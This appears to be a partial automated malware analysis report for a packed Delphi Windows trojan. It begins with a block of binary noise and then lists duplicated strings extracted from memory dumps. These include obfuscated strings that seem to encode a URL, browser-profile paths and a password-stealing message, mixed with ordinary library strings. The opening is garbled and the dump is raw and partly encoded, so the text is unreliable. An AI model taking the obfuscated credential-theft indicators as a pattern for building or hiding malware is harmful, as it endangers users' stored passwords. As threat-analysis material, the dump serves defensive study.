k...x..WmO.8.. Q.E Q..n.".^...w,..]>.O..;mD.TNJ.P....B..........<3...q..l.j9..!.s...s..-..4.Q.C.s....<.\.\....g.....jS...8.......,D#/..7..<..(L.F..?....i..%MS.@'.....`.......%}..f.....&i.a...$..X6.I./.....^R."......8IyF...n5....A>..Q.............i.A..Q.v..n..0.F...;0:...yt..w.4.C%[4.....oi:.Ll.RP..a9#&i..dla....jt..,525r5Vr...#e.*3kn.......V..])Es$T....7.q <7G........k...W.\.E...t..QA...b6.....h4D,:...T.`:....Y..K....i./....2."..$...<..L...)i....|_$.c#.mm.!.;.....'.."........V....o.*=;.6..ATER. aSb...1N......y........{H.a...Z.[.........\.q9.......U.T<T4.i......*wj=l..yn....M.........mm.... M@%M;t........rQ&..^.W...Q...Hk^...)-s.........;.....@^..'.%..._.qK.H..S..qE.x..3.U...WO...zf..2R...,.Z..4...{....f..jC....E..._Cji....)........w.<.......4.$.Y....0%.....?.S.UK.TY.Q...g..|...[..8.D....j."KD.v...P.....W ...$Y......y..|....!e....".3....EHEM.P.....z7;w...j_........U.<h........NT.X....X.8...id.!.7 ..K..Yo9..}....u..G8.|.Bf...!.PVT..O........._lg.\'....hos..h..$=.'..r.9;V]...'...5.n...D~..b..4f@%....Y..bcv..s.l.a .a......OFK}X...o..4acc..k..f.K..u..7.........2.s.&..Y9.~C.8..W...ak..Z. By. .....[...p..E..e/....5..~...xx...a...... ....x,.@f.m..m.:......;..]..}..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1504:
.idata
.idata
.rdata
.rdata
.reloc
.reloc
.rsrc
.rsrc
.aspack
.aspack
.adata
.adata
kernel32.dll
kernel32.dll
Windows
Windows
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
otcpa*cze
otcpa*cze
Otcpa
Otcpa
.wnmw
.wnmw
ob`gr[cl.lrol
ob`gr[cl.lrol
wlcpe[cl.lrol
wlcpe[cl.lrol
ijbgx[cl.lrol
ijbgx[cl.lrol
ejb".KhAojrgnp.
ejb".KhAojrgnp.
ejb".sd@ebipeJgticgve6.
ejb".sd@ebipeJgticgve6.
ejb".sd]ragf_tgpaiu
ejb".sd]ragf_tgpaiu
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35
ejb".sd]fmjn_kvvikhq
ejb".sd]fmjn_kvvikhq
ejb".sd]fmjn_k`dev`mri
ejb".sd]fmjn_k`dev`mri
ejb".sd]ojvcgajma`
ejb".sd]ojvcgajma`
baakn$(Ccgcrt,
baakn$(Ccgcrt,
ejb".Eeaetr*
ejb".Eeaetr*
ejb".PKFlc(Gxaewta
ejb".PKFlc(Gxaewta
ejb".BipmGtgapc
ejb".BipmGtgapc
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35$.knwrclhkmnwrgr-
Otcpa ?,84&*Wmhfosu"NP&4.5/"Pvcqtk)0.54,3"Vatqikh-16(35$.knwrclhkmnwrgr-
.VcfivcatPI*
.VcfivcatPI*
.MCFoshnoeb3Pvierauq(
.MCFoshnoeb3Pvierauq(
.hglg9
.hglg9
ejb".BipmGjmsa
ejb".BipmGjmsa
e|egpp&VTfRcsoRjragf.ccvTeuiOflgcp.
e|egpp&VTfRcsoRjragf.ccvTeuiOflgcp.
e|egpp&VTfRcsoRjragf.hicdBtmmQTN(
e|egpp&VTfRcsoRjragf.hicdBtmmQTN(
pvidihcq.mhk
pvidihcq.mhk
%EVRDERC%XIrevg^OtcpaXirevgrra`q.mhk
%EVRDERC%XIrevg^OtcpaXirevgrra`q.mhk
OtcpaSoldkqAleuq
OtcpaSoldkqAleuq
otcpa*cze$)loSol
otcpa*cze$)loSol
weovfmh"otcpa*cze
weovfmh"otcpa*cze
%EVRDERC%XKmzmjnaX@kra`mxX
%EVRDERC%XKmzmjnaX@kra`mxX
\wccrgn/marcderc.numn
\wccrgn/marcderc.numn
8UgavejPhseij&zmhhq=&nvtt
8UgavejPhseij&zmhhq=&nvtt
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaX
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaX
{wccrgnVevkq}#*2,#!.173;945247*2,#!.1(!%,4*2,#!.173;945247*4A55EF-F>26)2365 ;0A4/DBD794710075'(!Y]#/9"
{wccrgnVevkq}#*2,#!.173;945247*2,#!.1(!%,4*2,#!.173;945247*4A55EF-F>26)2365 ;0A4/DBD794710075'(!Y]#/9"
Dmurle
Dmurle
otcpa
otcpa
0|#,2|#,2|#,2|#,2|#,2|#,2|
0|#,2|#,2|#,2|#,2|#,2|#,2|
hprr: )dihc/smrg.vs-gar]ra`grat=perlev;575>
hprr: )dihc/smrg.vs-gar]ra`grat=perlev;575>
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaXBgfesntX
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaXAmocjg\Gnpoic^Uwcp @gvaXBgfesntX
%EvrDerc%XIrevg"Sk`vwetg\Kvgre&QtedneX
%EvrDerc%XIrevg"Sk`vwetg\Kvgre&QtedneX
dajgta&drkk"marc sngra&ie};Ú`cuhr"Sagpcl&Rrkpkdat"Ka
dajgta&drkk"marc sngra&ie};Ú`cuhr"Sagpcl&Rrkpkdat"Ka
EjsoDmurle
EjsoDmurle
ob`gr[sc.lrol
ob`gr[sc.lrol
wlcpe[sc.lrol
wlcpe[sc.lrol
ijbgx[sc.lrol
ijbgx[sc.lrol
png a~rrauq stktpcl tcpmmuqikh, Png bone$kcy$ncva&rapcltw*"pergnp&cptjkcerkoju. ptcdakcrou. giryvoehpu. kt"opngr$oltajnegrwah&rrkvgrp
png a~rrauq stktpcl tcpmmuqikh, Png bone$kcy$ncva&rapcltw*"pergnp&cptjkcerkoju. ptcdakcrou. giryvoehpu. kt"opngr$oltajnegrwah&rrkvgrp
.mkar|
.mkar|
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaX_cn`cz\]glda~@rkqqevZWsat"Derc\@cdaqjv\
%QUGRTTMFMJG%XJmcej"Sarvijaq\Evrlmectmil @gvaX_cn`cz\]glda~@rkqqevZWsat"Derc\@cdaqjv\
$&" $&" &ucfaYdovYcupipetjcca$8 bgnsa*
$&" $&" &ucfaYdovYcupipetjcca$8 bgnsa*
oleaut32.dll
oleaut32.dll
EVariantBadIndexError
EVariantBadIndexError
ssShift
ssShift
htKeyword
htKeyword
EInvalidOperation
EInvalidOperation
u%CNu
u%CNu
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
1.0.4
1.0.4
EIdCanNotBindPortInRange
EIdCanNotBindPortInRange
EIdInvalidPortRange@
EIdInvalidPortRange@
getservbyport
getservbyport
WSAAsyncGetServByPort
WSAAsyncGetServByPort
WSAJoinLeaf
WSAJoinLeaf
WS2_32.DLL
WS2_32.DLL
Wship6.dll
Wship6.dll
EIdIPVersionUnsupportedU
EIdIPVersionUnsupportedU
TIdSocketListWindows
TIdSocketListWindows
TIdStackWindowsU
TIdStackWindowsU
IdStackWindows
IdStackWindows
127.0.0.1
127.0.0.1
ftpTransfer
ftpTransfer
ftpReady
ftpReady
ftpAborted
ftpAborted
EIdTCPConnectionError
EIdTCPConnectionError
EIdObjectTypeNotSupported
EIdObjectTypeNotSupported
Portl
Portl
ClientPortMinl
ClientPortMinl
ClientPortMax
ClientPortMax
PortU
PortU
"EIdTransparentProxyUDPNotSupported
"EIdTransparentProxyUDPNotSupported
TIdTCPClientCustom
TIdTCPClientCustom
IdTCPClient
IdTCPClient
TIdTCPClient
TIdTCPClient
%EIdSocksUDPNotSupportedBySOCKSVersion
%EIdSocksUDPNotSupportedBySOCKSVersion
saUsernamePassword
saUsernamePassword
Passwordl
Passwordl
Port
Port
0.0.0.1
0.0.0.1
0.0.0.0
0.0.0.0
BoundPortl
BoundPortl
DefaultPort
DefaultPort
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
IdTCPConnection
ISO_646.irv:1991
ISO_646.irv:1991
ISO_646.basic:1983
ISO_646.basic:1983
ISO_646.irv:1983
ISO_646.irv:1983
csISO16Portuguese
csISO16Portuguese
csISO84Portuguese2
csISO84Portuguese2
windows-936
windows-936
csShiftJIS
csShiftJIS
ISO-8859-1-Windows-3.0-Latin-1
ISO-8859-1-Windows-3.0-Latin-1
csWindows30Latin1
csWindows30Latin1
ISO-8859-1-Windows-3.1-Latin-1
ISO-8859-1-Windows-3.1-Latin-1
csWindows31Latin1
csWindows31Latin1
ISO-8859-2-Windows-Latin-2
ISO-8859-2-Windows-Latin-2
csWindows31Latin2
csWindows31Latin2
ISO-8859-9-Windows-Latin-5
ISO-8859-9-Windows-Latin-5
csWindows31Latin5
csWindows31Latin5
csMicrosoftPublishing
csMicrosoftPublishing
Windows-31J
Windows-31J
csWindows31J
csWindows31J
windows-1250
windows-1250
windows-1251
windows-1251
windows-1252
windows-1252
windows-1253
windows-1253
windows-1254
windows-1254
windows-1255
windows-1255
windows-1256
windows-1256
windows-1257
windows-1257
windows-1258
windows-1258
Uh%XF
Uh%XF
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
password
password
Password
Password
CommentURL
CommentURL
IdHTTPHeaderInfo
IdHTTPHeaderInfo
ProxyPasswordl
ProxyPasswordl
ProxyPort
ProxyPort
%d%s%d
%d%s%d
Mozilla/3.0 (compatible; Indy Library)
Mozilla/3.0 (compatible; Indy Library)
TIdHTTPMethod
TIdHTTPMethod
IdHTTP
IdHTTP
TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
IdHTTP8
IdHTTP8
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPRequest
TIdHTTPProtocol
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTP
HTTPOptions4
HTTPOptions4
EIdHTTPProtocolException
EIdHTTPProtocolException
application/x-www-form-urlencoded
application/x-www-form-urlencoded
HTTPS
HTTPS
https
https
HTTP/1.0 200 OK
HTTP/1.0 200 OK
HTTP/
HTTP/
TSQLTimeStampVariantType
TSQLTimeStampVariantType
TSQLTimeStampData
TSQLTimeStampData
SqlTimSt
SqlTimSt
%s %s
%s %s
(%s%s)
(%s%s)
-%s%s
-%s%s
%s-%s
%s-%s
%s%s-
%s%s-
-%s %s
-%s %s
%s %s-
%s %s-
%s -%s
%s -%s
(%s- %s)
(%s- %s)
(%s %s)
(%s %s)
coInKey
coInKey
IADStanAsyncOperation
IADStanAsyncOperation
IADStanAsyncExecutor
IADStanAsyncExecutor
ole32.dll
ole32.dll
ftParadoxOle
ftParadoxOle
upWhereKeyOnly
upWhereKeyOnly
pfInKey
pfInKey
ImportedConstraint
ImportedConstraint
LookupKeyFields
LookupKeyFields
KeyFields
KeyFields
TSQLTimeStampField
TSQLTimeStampField
SQLTimeStamp
SQLTimeStamp
%s: %s
%s: %s
%s.%s
%s.%s
supports
supports
importNode
importNode
%s="%s"
%s="%s"
%s%s%s: %d%s%s
%s%s%s: %d%s%s
TADSQLTimeIntervalKind
TADSQLTimeIntervalKind
uADStanSQLTimeInt
uADStanSQLTimeInt
TADSQLTimeIntervalData
TADSQLTimeIntervalData
TADSQLTimeIntervalData0gJ
TADSQLTimeIntervalData0gJ
TADSQLTimeIntervalVariantType
TADSQLTimeIntervalVariantType
Cannot perform operation on non initialized interval value
Cannot perform operation on non initialized interval value
%u-%.2u
%u-%.2u
%u %.2u:%.2u:%.2u
%u %.2u:%.2u:%.2u
%u:%.2u:%.2u
%u:%.2u:%.2u
[%s] is not a valid interval
[%s] is not a valid interval
TADGUIxLoginHistoryStorage
TADGUIxLoginHistoryStorage
TADGUIxLoginDialogEvent
TADGUIxLoginDialogEvent
IADGUIxLoginDialog
IADGUIxLoginDialog
gcrSQLWait
gcrSQLWait
IADGUIxAsyncExecuteDialog
IADGUIxAsyncExecuteDialog
%sP%uY
%sP%uY
%sP%uM
%sP%uM
%sP%uD
%sP%uD
%sT%uH
%sT%uH
%sT%uM
%sT%uM
%sT%uS%uF
%sT%uS%uF
%sP%uY%uM
%sP%uY%uM
%sP%uDT%uH
%sP%uDT%uH
%sP%uDT%uH%uM
%sP%uDT%uH%uM
%sP%uDT%uH%uM%uS%uF
%sP%uDT%uH%uM%uS%uF
%sT%uH%uM
%sT%uH%uM
%sT%uH%uM%uS%uF
%sT%uH%uM%uS%uF
%sT%uM%uS%uF
%sT%uM%uS%uF
EADDBArrayExecuteError
EADDBArrayExecuteError
TADThreadMsgBase
TADThreadMsgBase
TADThreadStartMsg
TADThreadStartMsg
TADThreadStopMsg
TADThreadStopMsg
TADThreadTerminateMsg
TADThreadTerminateMsg
Failed to %s thread [%s].
Failed to %s thread [%s].
Timeout [%d] expired
Timeout [%d] expired
System error: %s
System error: %s
%s has not supported architecture [%s]. Required [%s].
%s has not supported architecture [%s]. Required [%s].
delphi32.exe
delphi32.exe
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\FileVersion
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\Comments
\StringFileInfo\%s\Comments
%d.%d.%d (Build %d)%s
%d.%d.%d (Build %d)%s
rvCmdExecMode
rvCmdExecMode
rvCmdExecTimeout
rvCmdExecTimeout
rvDirectExecute
rvDirectExecute
xoIfCmdsInactive
xoIfCmdsInactive
CmdExecMode
CmdExecMode
CmdExecTimeout
CmdExecTimeout
DirectExecute
DirectExecute
rsImportingCurent
rsImportingCurent
rsImportingOriginal
rsImportingOriginal
rsImportingProposed
rsImportingProposed
TADDatSForeignKeyConstraint
TADDatSForeignKeyConstraint
ChildKeyConstraint
ChildKeyConstraint
ParentKeyConstraint
ParentKeyConstraint
yyyy-mm-dd hh:nn:ss.zzz
yyyy-mm-dd hh:nn:ss.zzz
atPLSQLTable
atPLSQLTable
InKey
InKey
skExecute
skExecute
MSSQL
MSSQL
MYSQL
MYSQL
SQLITE
SQLITE
POSTGRESQL
POSTGRESQL
MySQL
MySQL
SQLite
SQLite
TADGUIxAsyncExecuteDialog
TADGUIxAsyncExecuteDialog
TADGUIxLoginDialog
TADGUIxLoginDialog
Object factory for class %s%s is missing
Object factory for class %s%s is missing
Class [%s] does not implement interface [%s]
Class [%s] does not implement interface [%s]
MSSQL2000
MSSQL2000
MSSQL2005
MSSQL2005
%s%s=%s%s%s%s
%s%s=%s%s%s%s
%s%s=%s%s
%s%s=%s%s
Password=*****
Password=*****
NewPassword
NewPassword
NewPassword=*****
NewPassword=*****
ADConnectionDefs.ini
ADConnectionDefs.ini
TADStanAsyncExecutor
TADStanAsyncExecutor
ARow.Table.Name
ARow.Table.Name
HistoryWithPassword(
HistoryWithPassword(
HistoryKey
HistoryKey
LoginRetries
LoginRetries
ChangeExpiredPasswordl
ChangeExpiredPasswordl
OnLogint
OnLogint
OnChangePasswordU
OnChangePasswordU
TADIndexes
TADIndexes
TADSQLTimeIntervalField
TADSQLTimeIntervalField
UpdateOptions.KeyFields
UpdateOptions.KeyFields
UpdateOptions.AutoIncFields
UpdateOptions.AutoIncFields
FSortView.SortingMechanism
FSortView.SortingMechanism
LocateRecord(AKeyFields)
LocateRecord(AKeyFields)
PSGetKeyFields
PSGetKeyFields
(SQLTimeInterval)
(SQLTimeInterval)
Uh.eQ
Uh.eQ
TADConnectionLoginEvent
TADConnectionLoginEvent
TADExecuteErrorEvent
TADExecuteErrorEvent
LoginDialog
LoginDialog
LoginPrompt
LoginPrompt
OnLoginp
OnLoginp
BeforeExecutel
BeforeExecutel
AfterExecutep
AfterExecutep
TADLocalSQLDataSet
TADLocalSQLDataSet
TADLocalSQLDataSets
TADLocalSQLDataSets
TADCustomLocalSQL
TADCustomLocalSQL
Indexes
Indexes
IndexesActive
IndexesActive
BeforeExecuteP
BeforeExecuteP
AfterExecuteP
AfterExecuteP
LocalSQL
LocalSQL
OnExecuteErrorl
OnExecuteErrorl
TADCustomCommand.Prepare
TADCustomCommand.Prepare
TADCustomCommand.Prepare - Exception
TADCustomCommand.Prepare - Exception
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare
TADCustomCommand.Unprepare - Exception
TADCustomCommand.Unprepare - Exception
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalClose - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished - Exception
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpenFinished
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalOpen - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished - Exception
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecuteFinished
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.InternalExecute - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished - Exception
TADCustomCommand.FetchFinished
TADCustomCommand.FetchFinished
TADCustomCommand.Fetch
TADCustomCommand.Fetch
TADCustomCommand.Fetch - Exception
TADCustomCommand.Fetch - Exception
TADDefaultLocalSQLAdapter
TADDefaultLocalSQLAdapter
EInvalidGraphicOperation
EInvalidGraphicOperation
USER32.DLL
USER32.DLL
comctl32.dll
comctl32.dll
uxtheme.dll
uxtheme.dll
MAPI32.DLL
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
JumpID("","%s")
TKeyEvent
TKeyEvent
TKeyPressEvent
TKeyPressEvent
HelpKeyword
HelpKeyword
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
AutoHotkeys
AutoHotkeys
ssHotTrack
ssHotTrack
TWindowState
TWindowState
poProportional
poProportional
TWMKey
TWMKey
KeyPreview
KeyPreview
WindowState
WindowState
OnKeyDownL
OnKeyDownL
OnKeyPress
OnKeyPress
OnKeyUp$
OnKeyUp$
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
vcltest3.dll
User32.dll
User32.dll
%s$#%d
%s$#%d
uADPhysCmdGenerator
uADPhysCmdGenerator
uADPhysCmdGeneratorU
uADPhysCmdGeneratorU
RDB$DB_KEY AS
RDB$DB_KEY AS
DB_KEY
DB_KEY
{LIMIT(%d,1)}
{LIMIT(%d,1)}
{LIMIT(%d)}
{LIMIT(%d)}
ADDrivers.ini
ADDrivers.ini
Warning: The client [%s] and server [%s] major versions difference > 1.
Warning: The client [%s] and server [%s] major versions difference > 1.
7.0.1 (Build 3119) Professional
7.0.1 (Build 3119) Professional
TADPhysCommandAsyncOperation
TADPhysCommandAsyncOperation
Table Indexes (
Table Indexes (
Table PKeys (
Table PKeys (
Table PKey Fields (
Table PKey Fields (
Table FKeys (
Table FKeys (
Table FKey Fields (
Table FKey Fields (
foreign key name
foreign key name
Primary key
Primary key
TADPhysCommandAsyncExecute
TADPhysCommandAsyncExecute
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
ABSOLUTE,ACTION,ADA,ADD,ALL,ALLOCATE,ALTER,AND,ANY,ARE,AS,ASC,ASSERTION,AT,AUTHORIZATION,AVG,BEGIN,BETWEEN,BIT,BIT_LENGTH,BOTH,BY,CASCADE,CASCADED,CASE,CAST,CATALOG,CHAR,CHAR_LENGTH,CHARACTER,CHARACTER_LENGTH,CHECK,CLOSE,COALESCE,COLLATE,COLLATION,COLUMN,COMMIT,CONNECT,CONNECTION,CONSTRAINT,CONSTRAINTS,CONTINUE,CONVERT,CORRESPONDING,COUNT,CREATE,CROSS,CURRENT,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,CURRENT_USER,CURSOR,DATE,DAY,DEALLOCATE,DEC,DECIMAL,DECLARE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DESCRIBE,DESCRIPTOR,DIAGNOSTICS,DISCONNECT,DISTINCT,DOMAIN,DOUBLE,DROP,ELSE,END,END-EXEC,ESCAPE,EXCEPT,EXCEPTION,EXEC,EXECUTE,EXISTS,EXTERNAL,EXTRACT,FALSE,FETCH,FIRST,FLOAT,FOR,FOREIGN,FORTRAN,FOUND,FROM,FULL,GET,GLOBAL,GO,GOTO,GRANT,GROUP,HAVING,HOUR,IDENTITY,IMMEDIATE,IN,INCLUDE,INDEX,INDICATOR,INITIALLY,INNER,INPUT,INSENSITIVE,INSERT,INT,INTEGER,INTERSECT,INTERVAL,INTO,IS,ISOLATION,JOIN,KEY,LANGUAGE,LAST,LEADING,LEFT,LEVEL,LIKE,LOCAL,LOWER,MATCH,MAX,MIN,MINUTE,MODULE,MONTH,NAMES,NATIONAL,NATURAL,NCHAR,NEXT,NO,NONE,NOT,NULL,NULLIF,NUMERIC,OCTET_LENGTH,OF,ON,ONLY,OPEN,OPTION,OR,ORDER,OUTER,OUTPUT,OVERLAPS,PAD,PARTIAL,PASCAL,PLI,POSITION,PRECISION,PREPARE,PRESERVE,PRIMARY,PRIOR,PRIVILEGES,PROCEDURE,PUBLIC,READ,REAL,REFERENCES,RELATIVE,RESTRICT,REVOKE,RIGHT,ROLLBACK,ROWSSCHEMA,SCROLL,SECOND,SECTION,SELECT,SESSION,SESSION_USER,SET,SIZE,SMALLINT,SOME,SPACE,SQL,SQLCA,SQLCODE,SQLERROR,SQLSTATE,SQLWARNING,SUBSTRING,SUM,SYSTEM_USER,TABLE,TEMPORARY,THEN,TIME,TIMESTAMP,TIMEZONE_HOUR,TIMEZONE_MINUTE,TO,TRAILING,TRANSACTION,TRANSLATE,TRANSLATION,TRIM,TRUE,UNION,UNIQUE,UNKNOWN,UPDATE,UPPER,USAGE,USER,USING,VALUE,VALUES,VARCHAR,VARYING,VIEW,WHEN,WHENEVER,WHERE,WITH,WORK,WRITE,YEAR,ZONE
#INDEXES
#INDEXES
#PRIMARYKEYS
#PRIMARYKEYS
#PRIMARYKEYFIELDS
#PRIMARYKEYFIELDS
#FOREIGNKEYS
#FOREIGNKEYS
#FOREIGNKEYFIELDS
#FOREIGNKEYFIELDS
PKEY_NAME
PKEY_NAME
FKEY_NAME
FKEY_NAME
PKEY_CATALOG_NAME
PKEY_CATALOG_NAME
PKEY_SCHEMA_NAME
PKEY_SCHEMA_NAME
PKEY_TABLE_NAME
PKEY_TABLE_NAME
PKEY_COLUMN_NAME
PKEY_COLUMN_NAME
RESULTSET_KEY
RESULTSET_KEY
RESULTSET_KEY =
RESULTSET_KEY =
TADPhysSQLiteMetadata
TADPhysSQLiteMetadata
TADPhysSQLiteCommandGenerator
TADPhysSQLiteCommandGenerator
ABORT,ADD,AFTER,ALL,ALTER,ANALYZE,AND,AS,ASC,ATTACH,AUTOINCREMENT,BEFORE,BEGIN,BETWEEN,BY,CASCADE,CASE,CAST,CHECK,COLLATE,COLUMN,COMMIT,CONFLICT,CONSTRAINT,CREATE,CROSS,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,DATABASE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DETACH,DISTINCT,DROP,EACH,ELSE,END,ESCAPE,EXCEPT,EXCLUSIVE,EXISTS,EXPLAIN,FAIL,FOR,FOREIGN,FROM,FULL,GLOB,GROUP,HAVING,IF,IGNORE,IMMEDIATE,IN,INDEX,INITIALLY,INNER,INSERT,INSTEAD,INTERSECT,INTO,IS,ISNULL,JOIN,KEY,LEFT,LIKE,LIMIT,MATCH,NATURAL,NOT,NOTNULL,NULL,OF,OFFSET,ON,OR,ORDER,OUTER,PLAN,PRAGMA,PRIMARY,QUERY,RAISE,REFERENCES,REGEXP,REINDEX,RENAME,REPLACE,RESTRICT,RIGHT,ROLLBACK,ROW,SELECT,SET,TABLE,TEMP,TEMPORARY,THEN,TO,TRANSACTION,TRIGGER,UNION,UNIQUE,UPDATE,USING,VACUUM,VALUES,VIEW,VIRTUAL,WHEN,WHERE
ABORT,ADD,AFTER,ALL,ALTER,ANALYZE,AND,AS,ASC,ATTACH,AUTOINCREMENT,BEFORE,BEGIN,BETWEEN,BY,CASCADE,CASE,CAST,CHECK,COLLATE,COLUMN,COMMIT,CONFLICT,CONSTRAINT,CREATE,CROSS,CURRENT_DATE,CURRENT_TIME,CURRENT_TIMESTAMP,DATABASE,DEFAULT,DEFERRABLE,DEFERRED,DELETE,DESC,DETACH,DISTINCT,DROP,EACH,ELSE,END,ESCAPE,EXCEPT,EXCLUSIVE,EXISTS,EXPLAIN,FAIL,FOR,FOREIGN,FROM,FULL,GLOB,GROUP,HAVING,IF,IGNORE,IMMEDIATE,IN,INDEX,INITIALLY,INNER,INSERT,INSTEAD,INTERSECT,INTO,IS,ISNULL,JOIN,KEY,LEFT,LIKE,LIMIT,MATCH,NATURAL,NOT,NOTNULL,NULL,OF,OFFSET,ON,OR,ORDER,OUTER,PLAN,PRAGMA,PRIMARY,QUERY,RAISE,REFERENCES,REGEXP,REINDEX,RENAME,REPLACE,RESTRICT,RIGHT,ROLLBACK,ROW,SELECT,SET,TABLE,TEMP,TEMPORARY,THEN,TO,TRANSACTION,TRIGGER,UNION,UNIQUE,UPDATE,USING,VACUUM,VALUES,VIEW,VIRTUAL,WHEN,WHERE
CAST(STRFTIME('%d',
CAST(STRFTIME('%d',
CAST(STRFTIME('%S',
CAST(STRFTIME('%S',
FROM sqlite_sequence WHERE name = '
FROM sqlite_sequence WHERE name = '
sqlite_master t1
sqlite_master t1
sqlite_temp_master t2)
sqlite_temp_master t2)
foreign_key_list("
foreign_key_list("
Password must be not empty
Password must be not empty
Invalid password is specified or DB is corrupted
Invalid password is specified or DB is corrupted
Invalid password is specified
Invalid password is specified
Cipher: Password must be not empty
Cipher: Password must be not empty
Cipher: failed to change the DB password
